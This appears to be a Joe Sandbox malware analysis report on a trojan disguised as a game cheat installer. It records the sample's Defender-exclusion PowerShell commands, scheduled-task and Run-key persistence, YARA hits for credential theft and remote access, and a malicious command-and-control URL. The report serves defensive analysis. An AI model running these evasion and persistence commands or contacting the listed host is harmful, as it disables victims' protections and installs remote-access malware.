klassguarantee(is_constantPool()) failedvtable restored by this call<pseudo-string> cache=0x%08x (extra) for /operands[%d]/preresolutionconstant pool [%d]A constant pool lockC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\constantPool.cppguarantee(!ConstantPool::is_invokedynamic_index(which)) failedan invokedynamic instruction does not have a klassRESOLVE %s %s
            Source: browserwinsvc.exe, 00000007.00000002.1947183113.000000001C24D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1728515342.000000000741F000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000000.1747946280.0000000000572000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe.7.dr Binary or memory string: tHGfSGePnSN5loNOcfS
            Source: is-KHA4M.tmp.2.dr Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
            Source: browserwinsvc.exe, 00000007.00000002.1943088220.000000001BA26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe API call chain: ExitProcess graph end node graph_3-23596
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0084866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0084866F
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0084753D mov eax, dword ptr fs:[00000030h] 3_2_0084753D
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0084B710 GetProcessHeap,3_2_0084B710
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process token adjusted: Debug
            Source: C:\Windows\addins\audiodg.exe Process token adjusted: Debug
            Source: C:\Windows\addins\audiodg.exe Process token adjusted: Debug
            Source: C:\Recovery\explorer.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Recovery\explorer.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083F063 SetUnhandledExceptionFilter,3_2_0083F063
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0083F22B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0084866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0084866F
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0083EF05
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe - Process created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe - Process created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe"
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe - Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe - Code function: 3_2_0083ED5B cpuid 3_2_0083ED5B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe - Code function: GetLocaleInfoW,GetNumberFormatW,3_2_0083A63C
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp - Queries volume information: C:\ VolumeInformation
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Queries volume information: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe VolumeInformation
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\addins\audiodg.exe - Queries volume information: C:\Windows\addins\audiodg.exe VolumeInformation
            Source: C:\Recovery\explorer.exe - Queries volume information: C:\Recovery\explorer.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe - Code function: 3_2_0083D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe - Code function: 3_2_0082ACF5 GetVersionExW,3_2_0082ACF5
            Source: C:\Windows\SysWOW64\wscript.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match - File source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: Process Memory Space: browserwinsvc.exe PID: 6456, type: MEMORYSTR
            Source: Yara match - File source: Process Memory Space: audiodg.exe PID: 7080, type: MEMORYSTR
            Source: Yara match - File source: Process Memory Space: audiodg.exe PID: 3196, type: MEMORYSTR
            Source: Yara match - File source: Process Memory Space: explorer.exe PID: 6092, type: MEMORYSTR
            Source: Yara match - File source: Process Memory Space: explorer.exe PID: 1196, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: browserwinsvc.exe PID: 6456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 7080, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6092, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1196, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 11 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 3 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 47 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 411 Registry Run Keys / Startup Folder | 411 Registry Run Keys / Startup Folder | 22 Software Packing | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 223 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 2 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1447650, Sample: uChcvn3L6R.exe, Startdate: 26/05/2024, Architecture: WINDOWS, Score: 92

            Source | Detection | Scanner | Label
            uChcvn3L6R.exe | 92% | ReversingLabs | Win32.Trojan.Dorv
            uChcvn3L6R.exe | 79% | Virustotal |
            uChcvn3L6R.exe | 100% | Avira | VBS/Runner.VPG
            uChcvn3L6R.exe | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy) | 3% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp | 3% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp | 3% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmp | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmp | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy) | 0% | Virustotal |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy) | 0% | ReversingLabs |
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy) | 0% | Virustotal |

            No Antivirus matches
            Source | Detection | Scanner | Label
            ip-api.com | 0% | Virustotal |

            Source | Detection | Scanner | Label
            http://www.innosetup.com/ | 0% | URL Reputation | safe
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
            http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | 0% | URL Reputation | safe
            http://ocsp.thawte.com0 | 0% | URL Reputation | safe
            http://ocsp.thawte.com0 | 0% | URL Reputation | safe
            http://bugreport.sun.com/bugreport/ | 0% | URL Reputation | safe
            http://java.oracle.com/ | 0% | URL Reputation | safe
            http://www.symauth.com/cps0( | 0% | URL Reputation | safe
            http://www.dk-soft.org/ | 0% | URL Reputation | safe
            http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
            http://www.symauth.com/rpa00 | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
            http://ip-api.com | 0% | URL Reputation | safe
            https://aka.ms/pscore68 | 0% | URL Reputation | safe
            http://www.remobjects.com/ps | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
            http://ocsp.example.net:80 | 0% | Avira URL Cloud | safe
            http://go.micN | 0% | Avira URL Cloud | safe
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb | 100% | Avira URL Cloud | malware
            http://www.oracle.com/technetwork/java/javaseproducts/C: | 0% | Avira URL Cloud | safe
            https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
            http://openjdk.java.net/jeps/220). | 0% | Avira URL Cloud | safe
            http://www.oracle.com/hotspot/jvm/vm/compiler/id | 0% | Avira URL Cloud | safe
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb | 15% | Virustotal |
            https://github.com/Pester/Pester | 1% | Virustotal |
            http://www.oracle.com/hotspot/jvm/vm/gc/id | 0% | Avira URL Cloud | safe
            http://ocsp.example.net:80 | 0% | Virustotal |
            http://www.oracle.com/technetwork/java/javase/overview/ | 0% | Avira URL Cloud | safe
            http://counter-strike.com.ua/ | 0% | Avira URL Cloud | safe
            http://www.oracle.com/hotspot/jvm/vm/compiler/id | 0% | Virustotal |
            http://www.oracle.com/hotspot/jvm/vm/gc/id | 0% | Virustotal |
            http://www.oracle.com/technetwork/java/javaseproducts/ | 0% | Avira URL Cloud | safe
            http://www.oracle.com/technetwork/java/javaseproducts/C: | 0% | Virustotal |
            http://www.oracle.com/technetwork/java/javase/overview/ | 0% | Virustotal |
            http://counter-strike.com.ua/ | 0% | Virustotal |
            http://www.oracle.com/hotspot/jvm/java/monitor/address | 0% | Avira URL Cloud | safe
            http://download.oracle.com/javase/7/docs/technotes/guides/plugin/ | 0% | Avira URL Cloud | safe
            http://www.oracle.com/hotspot/jvm/ | 0% | Avira URL Cloud | safe
            http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id | 0% | Avira URL Cloud | safe
            http://openjdk.java.net/jeps/220). | 0% | Virustotal |
            http://www.oracle.com/technetwork/java/javaseproducts/ | 0% | Virustotal |
            http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven | 0% | Avira URL Cloud | safe
            http://www.oracle.com/hotspot/jvm/java/monitor/address | 0% | Virustotal |
            http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id | 0% | Virustotal |
            http://www.oracle.com/hotspot/jvm/ | 0% | Virustotal |
            http://download.oracle.com/javase/7/docs/technotes/guides/plugin/ | 0% | Virustotal |
            http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven | 0% | Virustotal |

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ip-api.com | 208.95.112.1 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb | true | 15%, Virustotal; Avira URL Cloud: malware | unknown
            http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown

            IP | Domain | Country | ASN | ASN Name | Malicious
            208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447650
            Start date and time:2024-05-26 10:01:10 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 11m 6s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:50
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Sample name:uChcvn3L6R.exe
            renamed because original name is a hash value
            Original Sample Name:236b78f3cd3a0b771d318f044dda8f45.exe
            Detection:MAL
            Classification:mal92.troj.expl.evad.winEXE@41/475@1/1
            EGA Information:
            • Successful, ratio: 16.7%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): schtasks.exe
            • Excluded domains from analysis (whitelisted): 729231cm.n9shteam1.top, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target audiodg.exe, PID 3196 because it is empty
            • Execution Graph export aborted for target audiodg.exe, PID 7080 because it is empty
            • Execution Graph export aborted for target browserwinsvc.exe, PID 6456 because it is empty
            • Execution Graph export aborted for target explorer.exe, PID 1196 because it is empty
            • Execution Graph export aborted for target explorer.exe, PID 6092 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            04:02:13 | API Interceptor | 1x Sleep call for process: browserwinsvc.exe modified
            04:02:18 | API Interceptor | 131x Sleep call for process: powershell.exe modified
            09:02:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:02:12 | Task Scheduler | Run new task: audiodg path: "C:\Windows\addins\audiodg.exe"
            09:02:12 | Task Scheduler | Run new task: audiodga path: "C:\Windows\addins\audiodg.exe"
            09:02:12 | Task Scheduler | Run new task: explorer path: "C:\Recovery\explorer.exe"
            09:02:12 | Task Scheduler | Run new task: explorere path: "C:\Recovery\explorer.exe"
            09:02:12 | Task Scheduler | Run new task: qiOZcVoixJLcuAFKAnRd path: "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:02:13 | Task Scheduler | Run new task: qiOZcVoixJLcuAFKAnRdq path: "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:02:14 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
            09:02:17 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
            09:02:19 | Task Scheduler | Run new task: WinStore.App path: "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:02:20 | Task Scheduler | Run new task: WinStore.AppW path: "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:02:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
